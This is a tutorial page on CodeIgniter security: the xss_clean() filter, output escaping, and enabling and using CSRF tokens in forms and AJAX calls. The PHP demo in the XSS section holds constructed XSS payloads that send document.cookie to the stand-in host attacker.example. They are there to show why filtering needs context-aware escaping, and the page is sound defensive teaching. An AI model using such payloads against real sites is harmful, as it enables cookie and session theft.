Codeigniter - SPLessons

CodeIgniter Security


CodeIgniter Security

Description

Cross-site scripting (XSS) is an attack in which untrusted input (GET/POST parameters, cookies, or any other user-controlled data) is printed into a page as HTML or JavaScript and runs in the victim's browser, where it can steal cookies or other sensitive information. CodeIgniter's Security class provides an XSS filter, xss_clean(), that tries to strip or neutralise such payloads. If the filter is not applied, data arriving through cookies and GET/POST methods is used directly by the application, which is dangerous as soon as it is echoed back into a page. To sanitize a particular value, pass it through xss_clean().

Syntax: First load the "security" class in the controller's constructor (in CodeIgniter 3 the Security class is loaded automatically, so this step is only needed on older versions):

[php]$this->load->library("security");[/php]

Then filter the value with xss_clean():

[php]$data = $this->security->xss_clean($data);[/php]

The same filter can also be applied per input by passing TRUE as the second argument of $this->input->post('name', TRUE) (or get()), or to every request with $config['global_xss_filtering'] = TRUE in application/config/config.php. Note that xss_clean() is a best-effort blacklist filter and is not a substitute for escaping output: a value written into HTML should still go through html_escape() (htmlspecialchars()) at the point where it is printed, because the filter does not know which context (text, attribute, script) the value will end up in.
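The following stand-alone script is an added example, not code from the SPLessons page or from CodeIgniter. It shows why an input-side filter in the style of xss_clean() has to be paired with context-aware escaping at output time. naive_xss_filter() is a hypothetical, deliberately simple blacklist written only to illustrate the blind spot (it is not xss_clean()); escape_html() wraps htmlspecialchars(), which is what CodeIgniter's html_escape() helper does; escape_js() and the attacker.example payloads are likewise constructed for this example.

```php
<?php
// Added example (not from SPLessons or CodeIgniter): input filtering versus
// context-aware output escaping. naive_xss_filter() is a hypothetical stand-in
// for a blacklist filter, written only to show what such filters miss.
declare(strict_types=1);

/** Escape for an HTML text node or a double-quoted attribute
 *  (the same call CodeIgniter's html_escape() helper makes). */
function escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Escape for use as a JavaScript string literal inside a <script> block. */
function escape_js(string $value): string
{
    $json = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $json === false ? '""' : $json;
}

/** Hypothetical blacklist filter: strips <script> blocks and "javascript:" URLs
 *  but knows nothing about the context the value will be printed in. */
function naive_xss_filter(string $value): string
{
    $value = (string) preg_replace('#<script\b[^>]*>.*?</script>#is', '', $value);
    return (string) preg_replace('#javascript\s*:#i', '', $value);
}

// Constructed attacker inputs: the first is what blacklist filters catch,
// the other two are the kind they miss.
$payloads = [
    'script tag'         => '<script>location="http://attacker.example/?c="+document.cookie</script>',
    'attribute breakout' => '" autofocus onfocus="fetch(\'http://attacker.example/?c=\'+document.cookie)',
    'script breakout'    => '</script><script>alert(document.cookie)</script>',
];

foreach ($payloads as $label => $raw) {
    $filtered = naive_xss_filter($raw);
    echo "== $label ==\n";
    // Filter, then print into an attribute: the attribute breakout passes the
    // filter untouched, so its onfocus= handler lands in the markup.
    echo 'filtered, attribute ctx: <input value="' . $filtered . "\">\n";
    // Filter, then print into a script: the third payload leaves a bare
    // </script> behind that still closes the block early.
    echo 'filtered, script ctx   : <script>var v = "' . $filtered . "\";</script>\n";
    // Escape for the real output context instead: all three are inert.
    echo 'escaped, attribute ctx : <input value="' . escape_html($raw) . "\">\n";
    echo 'escaped, script ctx    : <script>var v = ' . escape_js($raw) . ";</script>\n";
}
```

Run it with `php xss_demo.php` and compare the "filtered" and "escaped" lines for each payload: the filter removes the obvious <script> tag but does nothing about a quote that closes an attribute, while escaping for the context in which the value is actually printed handles every case without needing to know what an attack looks like.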

CSRF Token

Description

CSRF (Cross-Site Request Forgery) protection is a built-in feature of CodeIgniter, but it is disabled by default. To enable it and secure the application's forms, a config variable in application/config/config.php has to be changed. Once enabled, every POST request the application receives is checked by the CSRF mechanism. The CSRF token is a random hash string that CodeIgniter issues to the browser in a cookie and that must be sent back as a hidden form field with every submission. Before the request is processed, the submitted value is compared with the value in the cookie. The request is accepted only when both values match; otherwise it is rejected. Because the check applies to POST requests only, state-changing actions must not be reachable through GET.

Enable CSRF protection

In a CodeIgniter application, CSRF protection is enabled by changing the default value of FALSE to TRUE in the file config.php in the application/config folder, as shown below.

[php]
$config['csrf_protection'] = TRUE;  // changed FALSE to TRUE
$config['csrf_token_name'] = 'csrf_test_name';
$config['csrf_cookie_name'] = 'csrf_cookie_name';
[/php]

In the above code, the token and cookie names can be changed to anything; the values shown here are CodeIgniter's defaults, and they are the names that appear in the form output and AJAX examples below. Whatever is set as csrf_token_name is the POST field name the check looks for, so it must match the hidden input in every form. The same file also carries csrf_expire (token lifetime in seconds) and, in CodeIgniter 3, csrf_regenerate (issue a new token after every request) and csrf_exclude_uris (URIs that skip the check, for example endpoints that receive POSTs from third-party services).
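To make the check described above concrete, here is a stand-alone model of the double-submit comparison that csrf_protection enables. It is an added example, not the SPLessons page's code and not CodeIgniter's own implementation (which lives in the framework's Security class and generates its tokens differently); the functions csrf_generate_token(), csrf_verify(), csrf_hidden_field() and csrf_gate() are hypothetical names for this example, the 32-hex-character token format mirrors the value shown in the form output below, and the field and cookie names are the CodeIgniter defaults. The request arrays are constructed inline.

```php
<?php
// Added example (not from SPLessons or CodeIgniter): a model of the
// double-submit CSRF check. The token is issued in a cookie and must come
// back in the POST body under the configured field name; the request passes
// only if both are present and equal.
declare(strict_types=1);

const CSRF_TOKEN_NAME  = 'csrf_test_name';   // $config['csrf_token_name']
const CSRF_COOKIE_NAME = 'csrf_cookie_name'; // $config['csrf_cookie_name']

/** Issue a fresh 32-hex-character token from the CSPRNG. */
function csrf_generate_token(): string
{
    return bin2hex(random_bytes(16));
}

/**
 * Double-submit check. $post and $cookie are the arrays a framework builds
 * from $_POST and $_COOKIE. Returns true only for a well-formed cookie token
 * that equals the posted token; hash_equals() keeps the comparison
 * constant-time so the token cannot be recovered byte by byte.
 */
function csrf_verify(array $post, array $cookie): bool
{
    $posted = $post[CSRF_TOKEN_NAME]    ?? null;
    $stored = $cookie[CSRF_COOKIE_NAME] ?? null;
    if (!is_string($posted) || !is_string($stored)) {
        return false;   // token missing, or an array smuggled in via field[]=
    }
    if (preg_match('/^[0-9a-f]{32}$/', $stored) !== 1) {
        return false;   // cookie value is empty or was tampered with
    }
    return hash_equals($stored, $posted);
}

/** The hidden input a hand-written form needs (same as the custom-form snippet). */
function csrf_hidden_field(string $token): string
{
    return '<input type="hidden" name="' . CSRF_TOKEN_NAME . '" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '" />';
}

/**
 * Gate a request the way the framework does: only POST is checked, which is
 * why state-changing actions must never be reachable through GET.
 * The rejection text is the message CodeIgniter shows on a failed check.
 */
function csrf_gate(string $method, array $post, array $cookie): string
{
    if ($method !== 'POST') {
        return 'not checked (non-POST)';
    }
    return csrf_verify($post, $cookie)
        ? 'accepted'
        : 'rejected: The action you have requested is not allowed.';
}

// Constructed requests against one issued token.
$token  = csrf_generate_token();
$cookie = [CSRF_COOKIE_NAME => $token];

$cases = [
    'genuine form post'       => ['POST', [CSRF_TOKEN_NAME => $token, 'username' => 'alice'], $cookie],
    'cross-site form post'    => ['POST', ['username' => 'alice'], $cookie], // attacker cannot read the cookie
    'guessed token'           => ['POST', [CSRF_TOKEN_NAME => str_repeat('0', 32)], $cookie],
    'array instead of string' => ['POST', [CSRF_TOKEN_NAME => [$token]], $cookie],
    'cookie cleared'          => ['POST', [CSRF_TOKEN_NAME => $token], []],
    'state change over GET'   => ['GET',  [], $cookie],
];

foreach ($cases as $label => [$method, $post, $ck]) {
    printf("%-25s %s\n", $label, csrf_gate($method, $post, $ck));
}
echo csrf_hidden_field($token), "\n";
```

The cases spell out what the mechanism relies on: an attacker's page can make the victim's browser send the cookie, but it cannot read the cookie's value to copy it into the form body, so a forged POST never carries a matching token. The strict type and format checks matter in PHP because a request field can arrive as an array, and a loose comparison against a malformed cookie is exactly the kind of edge a real check must reject rather than coerce.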

Methods to use CSRF Token

Description

There are two ways to include the CSRF token in a form in a CodeIgniter application: let the form helper add it, or add the hidden field to a custom form by hand. Requests made with AJAX must send the token along with the POST data as well.

Form helper

With CodeIgniter's form helper, form_open() adds the CSRF hidden field automatically. In a hand-written form, a hidden input with the token name and value has to be added manually.

Using the form helper:

[php]
<?php echo form_open(base_url('user/login'), array('id' => 'login', 'class' => 'login')); ?>
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" name="submit" value="Submit" />
<?php echo form_close(); ?>
[/php]

Output (the token value is different on every visit; base_url() does not include index.php, so the action is the URL passed to form_open()):

[php]
<form action="http://localhost/codeigniter/user/login" method="post" accept-charset="utf-8" id="login" class="login">
<div style="display:none">
<input type="hidden" name="csrf_test_name" value="0729bc908947526aa2e7951fb9066701" />
</div>
<input type="text" name="username" />
<input type="password" name="password" />
<input type="submit" name="submit" value="Submit" />
</form>
[/php]

Using a custom form, add the hidden field yourself. get_csrf_token_name() and get_csrf_hash() return the configured field name and the current token, so the form keeps working if csrf_token_name is changed in the config:

[php]
<input type="hidden" name="<?php echo $this->security->get_csrf_token_name(); ?>" value="<?php echo $this->security->get_csrf_hash(); ?>" />
[/php]

Use in AJAX call

If the application uses AJAX and the token is not sent with the POST data, CodeIgniter rejects the request with the error page "The action you have requested is not allowed." (HTTP 403 in CodeIgniter 3, HTTP 500 in the 2.x releases), so every POST made from JavaScript must include the token too. Expose the token name and value to JavaScript in the page head and add them to the POST data:

[html]
<!-- Add the CSRF token name and value as variables in HEAD -->
<script type="text/javascript">
var csrf_name  = '<?php echo $this->security->get_csrf_token_name(); ?>';
var csrf_token = '<?php echo $this->security->get_csrf_hash(); ?>';
</script>
<!-- AJAX call that sends the CSRF token with the POST data -->
<script type="text/javascript">
var post_data = { data: 'value' };
post_data[csrf_name] = csrf_token;   // field name taken from the config, not hard-coded
$.post('POST URL', post_data, function (response) {
    // handle response
}, 'json');
</script>
[/html]

Note: when $config['csrf_regenerate'] is TRUE (the default in CodeIgniter 3), a new token is issued after every POST, so a page that makes several AJAX requests must pick up the new value (from the cookie named by csrf_cookie_name, or from the response) before the next request; otherwise only the first request succeeds.

Summary

Key Points

  • The method xss_clean() passes data through the XSS filter; it does not replace escaping the value with html_escape() when it is printed.
  • The CSRF token is a random hash string issued in a cookie and checked against the hidden field sent with every POST request.
  • Using CodeIgniter's form helper, the CSRF token is added automatically; in a custom form or an AJAX request it has to be added by hand.